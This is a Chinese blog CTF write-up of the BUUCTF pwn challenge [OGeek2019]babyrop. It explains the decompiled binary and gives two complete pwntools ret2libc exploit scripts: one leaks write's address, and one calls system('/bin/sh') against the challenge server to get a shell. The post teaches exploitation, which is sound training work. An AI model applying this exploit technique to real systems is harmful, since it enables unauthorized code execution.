[OGeek2019]babyrop【BUUCTF】

最新推荐文章于 2024-05-06 17:11:26 发布
最新推荐文章于 2024-05-06 17:11:26 发布
阅读量185 收藏 1
点赞数
分类专栏: CTF训练 PWN 文章标签: 安全 PWN linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126550608
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

在这里插入图片描述
发现保护基本没开,IDA分析:

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h]
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]
  init_0();
  fd = open("/dev/urandom", 0);
  if ( fd > 0 )
    read(fd, &buf, 4u);
  v2 = sub_804871F(buf);
  sub_80487D0(v2);
  return 0;
}

先生成一个随机数,将随机数存入buf中(4u小于14h不存在溢出)。将buf作为sub_804871F函数的参数传入

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 buf[7]; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]
  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1);
  v6 = read(0, buf, 0x20u);
  buf[v6 - 1] = 0;
  v1 = strlen(buf);
  if ( strncmp(buf, &s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return buf[7];
}

a1即buf,sprintf()函数将生成的随机数a1加到了s[32]的数组中。这里题目有read函数,但是没有栈溢出的可能,读入buf之后,读取buf的长度,然后比较buf和s字符串的大小(比较长度为前v1个字符)。
此时如果strncmp()的结果不为0,则直接退出程序。因此我们第一个目的:使strncmp结果为0。而a1为随机数,因此考虑将v1=0,这样strncmp()则为0,而v1 = strlen(buf);我们可以考虑将buf的第一个字符填充为‘\x00’,然后该函数将buf[7]返回,v2= buf[7],v2作为sub_80487D0的参数

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]
  if ( a1 == 127 )
    result = read(0, &buf, 0xC8u);
  else
    result = read(0, &buf, a1);
  return result;
}

若a1==127,则执行read(0, &buf, 0xC8u),0xc8小于0xe7,无法溢出,但若a1!=127,执行read(0, &buf, a1),当a1足够大,则可以溢出,至少要大于0xe7+4=235,因此尽可能使得a1足够大,构造payload = ‘\x00’+‘\xff’*7
之后进入sub_80487D0,执行read(0, &buf, a1),由于本体没有system函数,没有/bin/sh,因此需要使用libc进行构造,利用write泄露write_got地址,利用LibcSearcher找到对应libc【后面发现题目给了指定的libc,哈哈没注意】,完整代码

from pwn import *
from LibcSearcher import *
io = process("./pwn")
# io = remote("node4.buuoj.cn",29222)
elf = ELF("./pwn")
payload = '\x00'+'\xff'*7
io.sendline(payload)
io.recvuntil("Correct\n")
write_plt = elf.plt["write"]
write_got = elf.got["write"]
main_addr = 0x08048825
payload2 = b'a'*0xe7+b'a'*4+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload2)
write_addr = u32(io.recv(4))
print(hex(write_addr))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
io.sendline(payload)
io.recvuntil("Correct\n")
payload3 = b'a'*0xe7+b'a'*4 + p32(system_addr) + p32(main_addr)+ p32(str_bin_sh)
io.sendline(payload3)
io.interactive()

LibcSearcher 有时候不给力,官方给出了libc就最好用官方libc

# 使用官方libc版本
from pwn import *
io = remote("node4.buuoj.cn",29222)
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')
system_libc = libc.symbols['system'] # 这仅仅是libc中的地址,实际运行中的地址为libc_base+libc["system"]
binsh_libc = next(libc.search(b'/bin/sh'))
write_libc = libc.symbols['write']
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x8048825
payload = b'\x00' + b'\xff' * 6 + b'\xff'  # v5
io.sendline(payload)
io.recvuntil("Correct\n")
payload = b'a' * (0xe7 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
io.sendline(payload)
write_addr = u32(io.recv(4))
# 得到了write在内存中的位置 所以我们可以用题目提供的函数共享库算出system在内存中的位置
base = write_addr - write_libc
system_addr = system_libc + base
binsh_addr = binsh_libc + base
payload = b'\x00' + b'\xff' * 7
io.sendline(payload)

io.recvuntil("Correct\n")
# 第二次就直接把返回地址改成system的地址

payload = b'a' * (0xe7 + 4) + p32(system_addr) + p32(main_addr)

payload += p32(binsh_addr)
io.sendline(payload)
io.interactive()
Mokapeng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek2019bayrop
m0_62322730的博客
05-06 355
OGeek2019bayrop
从2023蓝帽杯0解题heapSpary入门堆喷
ftiusadfnjew的博客
10-31 28
此题为2023年蓝帽杯初赛0解pwn题,比赛的时候是下午放出的,很难在赛点完成该题,算是比较高难度的题,他的题目核心思想确实和题目名字一样,堆喷,大量的随机化和滑板指令思想,在赛后一天后完成了攻破。此题,不是因为0解我才觉得他有意义,是因为他的堆喷思想和实际在工作中的二进制利用是很贴合的,确实第一次打这种题。
[OGeek2019]babyrop[BUUCTF]
最新发布
moonlightsunshin的博客
05-06 363
首先我们要确保strncmp=0保证程序不退出,直接让v1=0strncmp就会为0strncmp用来获取长度当读到"\0"会自动赋0所以我们让buf[0]="\x00"没有/bin/sh和system加上题目这道题的思路就是利用write泄露出libc的地址来进行ROP。buf长度只需0xe7+4就可以溢出。32位开了NX,地址随机化基本排除shellcode的可能。write也是libc库中的标准函数。shift+f12看字符串。
[OGeek2019]babyrop
m0sway的博客
03-22 1111
[OGeek2019]babyrop WriteUp BUU_PWN
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3627
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTFpwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 420
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
OGeek数据-数据集
03-30
标题中的“OGeek数据-数据集”表明这是一个与数据科学相关的资源,可能是用于机器学习、数据挖掘或数据分析的任务。这个数据集可能包含了各种类型的数据,例如数值、文本、图像等,供研究者进行建模和算法开发。 ...
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
OGeek-数据集
03-30
标题中的“OGeek-数据集”表明这是一个与OGeek相关的数据集合,可能是用于机器学习、数据分析或人工智能项目的训练和评估数据。OGeek可能是一个竞赛平台、研究项目或者是一个专注于数据科学的社区。 描述中只提到...
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 239
BUUCTF 做题练习
今天你pwn了吗(三)
蚁景网安学院
06-04 745
前言我们接着前两篇的内容继续往下学习。所有题目都可在BUU平台搜索得到 Ctal+F 然后输入题目名字即可。同样的,在开始之前我们先来看下几个 函数吧,一定要 好好学下遇到的函数呢,很重...
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1228
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 247
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
日行一PWN babyrop 动态链接库的使用
m0_57221101的博客
05-17 406
​ 我们在之前的机器中,通常就是利用一段程序中代码段下已有的指令来实现我们得到flag或者拿下shell的目的。但是抛出了一个问题,如果程序中没有危险语句,就无从下手。 ​ 所以,此次我们引出了一个概念,动态链接库libc。这也解决了我一直以来的问题,为什么call的函数点进去只能看到return,因为声明的函数并不在代码的cs段内,而是应用了随机化存储,存在内存的其他地方了。 ​ 之后通过某些方法调用,这个某些方法这事以后的事情了。闲话少叙,我们开始今天的日行一pwn。 开始 例行检查,开启了
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 664
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值